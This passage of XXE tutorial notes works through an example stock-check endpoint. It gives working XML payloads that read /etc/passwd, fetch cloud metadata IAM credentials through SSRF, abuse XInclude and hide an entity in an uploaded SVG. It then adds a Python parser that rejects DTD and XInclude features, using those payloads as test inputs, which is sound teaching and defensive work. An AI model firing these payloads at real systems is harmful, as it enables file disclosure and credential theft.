For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>

The application has no particular defenses against XXE attacks, so the XXE vulnerability can be exploited to retrieve the /etc/passwd file by submitting the following XXE payload:

Exploiting XXE using external entities to retrieve files

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Exploiting XXE to perform SSRF attacks

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Exploiting XInclude to retrieve files

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

Exploiting XXE via image file upload

Create a local SVG image with the following content:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Upload it, then access the image to view the content of the file.
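The common root of the four payloads above is a parser that honours DTD features (DOCTYPE, entity declarations, external entity references) or XInclude. The following is an added defensive example, not code from these notes or from any product they describe: it parses the stockCheck document with Python's standard-library expat parser and refuses the document as soon as any of those features appears, returning a reason string that can be logged. The sample documents are constructed copies of the payloads above; the XInclude case is shown as the XML a server would build after embedding the injected productId value, which is an assumption about how such an endpoint is wired.

```python
"""Refuse DTD and XInclude features while parsing a stockCheck request.

Added example using only the standard library. Element names
(stockCheck, productId) come from the notes; the rejection policy is
deny-by-feature: any DOCTYPE, entity declaration, external entity
reference or XInclude element aborts the parse.
"""
import xml.parsers.expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


class UnsafeXML(Exception):
    """Raised from an expat handler the moment a forbidden feature is seen."""


def parse_stock_check(data: bytes):
    """Return (True, product_id) or (False, reason).

    expat is configured with namespace_separator=" " so element names
    arrive as "<namespace-uri> <local-name>", which lets the XInclude
    namespace be matched regardless of the prefix the attacker chose.
    """
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    chunks = []                      # character data inside <productId>
    depth = {"in_product": 0}        # nesting counter for <productId>

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE '{name}' declared; DTDs are not accepted")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity '{name}' declared (system id {sysid!r})")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity reference to {sysid!r}")

    def on_start(name, attrs):
        # name is "productId" for un-namespaced elements, or "uri local"
        if name.split(" ")[0] == XINCLUDE_NS:
            raise UnsafeXML(f"XInclude element href={attrs.get('href')!r}")
        if name == "productId":
            depth["in_product"] += 1

    def on_end(name):
        if name == "productId":
            depth["in_product"] -= 1

    def on_chars(text):
        if depth["in_product"]:
            chunks.append(text)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    try:
        parser.Parse(data, True)
    except UnsafeXML as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    return True, "".join(chunks).strip()


# Constructed sample inputs, copied from the payloads in the notes above.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<stockCheck><productId>381</productId></stockCheck>')
FILE_XXE = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
            b'<stockCheck><productId>&xxe;</productId></stockCheck>')
SSRF_XXE = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM '
            b'"http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>'
            b'<stockCheck><productId>&xxe;</productId></stockCheck>')
# Assumed server-side document after the injected productId value is embedded.
XINCLUDE = (b'<stockCheck><productId>'
            b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            b'<xi:include parse="text" href="file:///etc/passwd"/></foo>'
            b'</productId></stockCheck>')
SVG_XXE = (b'<?xml version="1.0" standalone="yes"?>'
           b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>'
           b'<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
           b'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
           b'<text font-size="16" x="0" y="16">&xxe;</text></svg>')

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("file", FILE_XXE), ("ssrf", SSRF_XXE),
                       ("xinclude", XINCLUDE), ("svg", SVG_XXE)]:
        print(label, parse_stock_check(doc))
```

The same handlers can be attached to any expat-based parser; the point is that the decision is made on the feature being used, not on a blocklist of URLs, so a payload that swaps file:// for another scheme is refused for the same reason.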

Blind XXE with out-of-band interaction